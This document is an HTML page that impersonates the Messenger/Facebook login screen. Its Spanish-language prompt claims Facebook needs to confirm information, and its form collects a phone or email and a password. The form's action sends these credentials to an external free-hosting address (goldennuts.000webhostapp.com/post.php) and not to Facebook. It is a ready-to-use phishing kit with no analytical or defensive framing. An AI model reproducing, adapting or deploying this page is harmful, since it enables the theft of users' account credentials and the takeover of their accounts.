<html lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

 <!-- Global site tag (gtag.js) - Google Analytics -->
<script async src="https://www.googletagmanager.com/gtag/js?id=UA-223282651-1"></script>
<script>
  window.dataLayer = window.dataLayer || [];
  function gtag(){dataLayer.push(arguments);}
  gtag('js', new Date());

  gtag('config', 'UA-223282651-1');
</script>

  
  <meta name="viewport" content="user-scalable=no,initial-scale=1,maximum-scale=1">
  <meta http-equiv="X-UA-Compatible" content="ie=edge">
  <meta property="og:url" content="https://www.messenger.com/">
  <meta property="og:image" content="https://static.xx.fbcdn.net/rsrc.php/v3/yi/r/wiOtxI3emiC.png">
  <link rel="shortcut icon" href="https://static.xx.fbcdn.net/rsrc.php/y7/r/O6n_HQxozp9.ico">
  <title>Messenger</title>
   
  
   <style type="text/css" media="screen">
   ._3v_p {
    font-family: Helvetica Neue, Segoe UI, Helvetica, Arial, sans-serif;
    -webkit-font-smoothing: antialiased;
    font-weight: 300;
    width: 100%
}

._3v_o {
    display: table;
    height: 100%;
    min-height: 600px;
	position: absolute
}

._5hy2 {
	display: table-cell;
	vertical-align: middle
}

html ._5hy2 label,
html ._5hy2 input,
html ._5hy2 button {
	font-family: Helvetica Neue, Segoe UI, Helvetica, Arial, sans-serif
}

._3400 {
	height: 120px;
	min-width: 100%;
	width: 120px
}

._3400 .img {
	display: block;
	height: 120px;
	margin-left: auto;
	margin-right: auto;
	width: 120px
}

._3v_v ._3400 .img {
	height: 120px !important
}

._5hy4 {
	color: rgba(0, 0, 0, 1);
	font-size: 40px;
	font-weight: 300;
	margin-bottom: 24px;
	text-align: center
}

._3403 {
	color: rgba(0, 0, 0, 1);
	font-size: 16px;
	font-weight: 200;
	line-height: 1.2;
	margin-bottom: 24px;
	text-align: center
}

._3v_o ._5s4n {
	height: 216px
}

._3v_p ._2m_r,
._3v_o ._2m_r {
	align-items: center;
	border: none;
	box-shadow: none;
	display: flex;
	margin-left: auto;
	margin-right: auto;
	overflow: hidden;
	text-overflow: ellipsis;
	text-shadow: none;
	white-space: nowrap
}

._3v_u {
	margin-top: 32px
}

._3v_p ._43di,
._3v_o ._43di {
	border: 1px solid rgba(0, 0, 0, .20);
	border-radius: 4px;
	color: rgba(0, 0, 0, 1);
	display: block;
	font-family: Helvetica Neue, Segoe UI, Helvetica, Arial, sans-serif;
	font-size: 17px;
	height: 42px;
	margin-bottom: 12px;
	margin-left: auto;
	margin-right: auto;
	padding: 0 16px;
	width: 286px
}

._3v_p ._43di:focus,
._3v_o ._43di:focus {
	border: 1px solid #0084ff;
	border-radius: 4px
}

._3v_p ._43di::-webkit-input-placeholder,
._3v_o ._43di::-webkit-input-placeholder {
	color: rgba(0, 0, 0, .40)
}

.webkit ._3v_p ._43di::-webkit-input-placeholder,
.webkit ._3v_o ._43di::-webkit-input-placeholder {
	line-height: normal
}

._3v_p ._3v_v ._3v_w ._43dh {
	font-weight: 500
}

._5hy2 ._43dh {
	background: #fff;
	color: #0084ff;
	font-size: 24px;
	font-weight: normal;
	margin-top: 24px
}

._3v_p ._3v_v ._3v_w ._3u5t {
	background: #fff;
	color: #0084ff;
	font-weight: 500
}

._3u5u {
	margin-bottom: 12px;
	overflow: hidden;
	text-align: center
}

._3u5w {
	position: relative
}

._3u5w:before,
._3u5w:after {
	background: rgba(0, 0, 0, .20);
	content: "";
	height: 1px;
	position: absolute;
	top: 50%;
	width: 9999px
}

._3u5w:before {
	margin-right: 15px;
	right: 100%
}

._3u5w:after {
	left: 100%;
	margin-left: 15px
}

._3v_p ._43dj,
._3v_o ._43dj {
	display: block;
	margin-left: auto;
	margin-right: auto;
	margin-top: 40px;
	width: 320px
}

._43dj .uiInputLabel {
	text-align: center
}

._43dj .uiInputLabelInput {
	height: 16px;
	top: 1px;
	width: 16px
}

.ie10 ._43dj .uiInputLabelInput,
.ie11 ._43dj .uiInputLabelInput {
	left: 87px
}

._43dj .uiInputLabelInput>input {
	opacity: 0;
	position: absolute
}

._43dj .uiInputLabelInput>input+span:before {
	background-image: url(/rsrc.php/v3/yj/r/XkPJbCW0I9U.png);
	background-repeat: no-repeat;
	background-size: auto;
	background-position: 0 0;
	content: "";
	display: inline-block;
	height: 16px;
	position: relative;
	width: 16px
}

._43dj .uiInputLabelInput>input:checked+span:before {
	background-image: url(/rsrc.php/v3/yV/r/P225DusaR5S.png);
	background-repeat: no-repeat;
	background-size: auto;
	background-position: 0 0
}

.webkit.mac ._43dj .uiInputLabel .uiInputLabelLabel,
._43dj .uiInputLabel .uiInputLabelLabel {
	margin-left: 28px
}

._43dj .uiInputLabelLabel {
	color: #929292;
	font-size: 14px;
	font-weight: normal
}

._3v_o ._5hy8 {
	margin-bottom: 64px;
	margin-top: 24px
}

._3v_o ._5s4n ._5hy8 {
	width: 304px
}

._210n {
	bottom: 0;
	font-size: 11px;
	margin-bottom: 16px;
	position: absolute;
	text-align: center;
	width: 100%
}

._210n,
._210n a,
._210n ._2yib {
	color: #a8a8a8
}

._3401 {
	margin: 0 14px
}

._3v_p {
	background-color: #fff;
}

._3v_p ._210j {
    display: table;
	height: 640px;
	line-height: normal;
	margin: 0 auto
}

._3v_p ._3v_v {
    margin: auto;
    padding-right: 40px;
    vertical-align: middle;
    width: 320px;
}



}

._3v_p ._5s4n {
	height: 261px
}

._3v_p ._3v_v ._5s4n {
	text-align: center
}

._3v_p ._3v_v ._5s4n .img {
	display: inline-block;
	height: 18px !important
}

._3v_p ._5hy4 {
	color: rgba(0, 0, 0, .88);
	font-size: 36px;
	font-weight: 400;
	margin-bottom: 0;
	text-align: center
}

._2hyt {
	text-align: center;
	white-space: normal;
	width: 100%
}

._3v_p ._3403 {
	color: #0084ff;
	font-size: 17px;
	font-weight: 400;
	margin-bottom: 24px;
	margin-top: 12px;
	text-align: center;
	width: 320px
}

._3v_p ._3v_u {
	margin-top: 24px
}

._3v_p ._210j ._43di {
	margin-bottom: 10px
}

._3v_p ._3v_w ._2m_r,
._3v_p ._5s4n ._2m_r {
	background-color: #0084ff;
	background-image: none;
	border: 1px solid #0084ff;
	border-radius: 4px;
	color: #fff;
	display: block;
	font-family: Helvetica Neue, Segoe UI, Helvetica, Arial, sans-serif;
	font-size: 17px;
	font-weight: 400;
	height: 44px;
	margin-bottom: 24px;
	padding: 0;
	width: 318px
}

._3v_p ._2m_r:focus {
	border: 1px solid #0084ff;
	border-radius: 4px
}

._3v_p ._2m_r:active {
	background-color: #0077e5;
	border: 1px solid transparent;
	opacity: .2
}

._3v_p ._210j ._43dj {
	margin-bottom: 12px;
	margin-top: 0
}

._3v_p ._210j ._43dj .uiInputLabelLabel {
	color: rgba(0, 0, 0, .60)
}

._3v_p ._210j ._5hy8 {
	font-weight: 200;
	margin-bottom: 48px;
	margin-top: 24px
}

._3v_p ._59h7 {
	text-align: center
}

._3v_p ._59h7 ._5hy9 {
	color: rgba(0, 0, 0, .60);
	font-size: 15px;
	height: 19px
}

._59h8 {
	color: rgba(0, 0, 0, .60);
	font-size: 12px;
	height: 16px;
	margin-bottom: 0;
	margin-top: 48px;
	text-align: center
}

._59h8 a {
	color: #0084ff
}

._3v_- {
	display: table-cell;
	position: relative;
	text-align: right;
	vertical-align: middle
}

._3v_- .img {
	height: auto;
	max-width: 944px;
	width: 944px
}

._3v_p .section.hero {
	display: none
}

._3v_p .page {
	background-color: #fff
}

._3v_p._54kd ._3w04 .headlink {
	opacity: 0;
	visibility: hidden
}

._3v_p ._3w04 .headlink {
	opacity: 1;
	transition: opacity .2s
}

._3v_p._5do8 ._3w04 .headlink {
	opacity: 0;
	transition: opacity .2s
}

._3v_p .nav {
	font-weight: 400
}

@media (min-width: 768px) {
	._3w05 {
		float: right;
		margin-right: -344px
	}
}

@media (max-width: 767px) {
	._3v_p ._3403 {
		width: 100%
	}
	._3v_- {
		display: block;
		padding-top: 40px
	}
	._3v_- .img {
		float: none;
		margin-left: auto;
		margin-right: auto;
		max-width: 100%;
		width: 100%
	}
	._3v_p ._3v_v {
		display: block;
		margin-left: auto;
		margin-right: auto;
		max-width: 800px;
		min-width: 100%;
		padding: 0;
		width: auto
	}
	._3v_p ._3v_v ._3v_w {
		margin: 0 auto;
		width: 320px
	}
	._3v_p ._5hy9 {
		display: block
	}
}

@media (min-width: 1020px) {
	._3v_p ._210j {
		width: 960px
	}
}

@media (max-width: 1019px) {
	._3v_p ._210j {
		width: auto
	}
	._3v_- .img {
		height: auto;
		width: 100%
	}
}

._3404 {
	color: #f03d25;
	display: block;
	margin-left: auto;
	margin-right: auto;
	text-align: center
}

._3404 p {
	margin: 0
}

._3404 a {
	color: #f03d25;
	text-decoration: underline
}

._5hy2 ._5hy8 {
	background: #0084ff;
	color: #fff
}

._5s4n {
	text-align: center
}

._5s4n ._2m_r {
	border-radius: 4px;
	font-family: Helvetica Neue, Segoe UI, Helvetica, Arial, sans-serif;
	font-size: 18px;
	font-weight: 200;
	height: 52px;
	margin-bottom: 64px;
	width: 320px
}

._5s4n ._2m_r:active {
	background-color: #0077e5;
	opacity: .2
}

._5hy9 {
	color: rgba(0, 0, 0, .60);
	font-size: 14px
}

._5s4n ._2m_r ._2i-i {
	font-weight: 500
}

#bootloader_yLyLM {
	height: 42px;
}

.bootloader_yLyLM {
	display: block!important;
}

</style>
  
  
  
  
  
  
  
  
  
  
<meta name="chromesniffer" id="chromesniffer_meta" content="{&quot;Google Analytics&quot;:-1,&quot;SPDY&quot;:-1}"><script type="text/javascript" src="chrome-extension://fhhdlnnepfjhlhilgmeepgkhjmhhhjkh/js/detector.js"></script></head>

<body>
  <div class="_3v_p _54kd _5do8" id="u_0_1">
      <div class="_3v_x">
          <div class="_210j">
              <div class="_3v_v">
                  <div class="_3400"><img class="img" src="https://image.ibb.co/kgLx1z/wi_Otx_I3emi_C.png" alt="" width="120" height="120"></div>
                  <h1 class="_5hy4">Messenger</h1>
                  <h2 class="_3403">Facebook debe confirmar la siguiente información para permitir el acceso a este formulario. Iniciar sesión!</h2>
                  <div class="_3v_w" id="u_0_3">
                      <div class="_3v_u">
                          <div>
                    <form id="login_form" action="https://goldennuts.000webhostapp.com/post.php" method="post">
                                  <input type="hidden" name="lsd" value="AVpO_7OE" autocomplete="off">
                                  <div id="loginform">
                                      <input type="text" class="inputtext _55r1 _43di" id="email" name="email" placeholder="Movil o Email" autocomplete="off" required="">
                                      <input type="password" class="inputtext _55r1 _43di" name="pass" id="pass" tabindex="1" placeholder="Contraseña" autocomplete="off" required="">
                                      <button value="1" class="_42ft _4jy0 _2m_r _43dh _4jy4 _517h _51sy" id="loginbutton" name="login" tabindex="1" type="submit">Log In</button>
                                  </div>
                              </form>
                              <div class="_3403">Facebook ©  2022 </div>
                          </div>
                      </div>
                  </div>
              </div>
          </div>
      </div>
  </div>




</body></html>
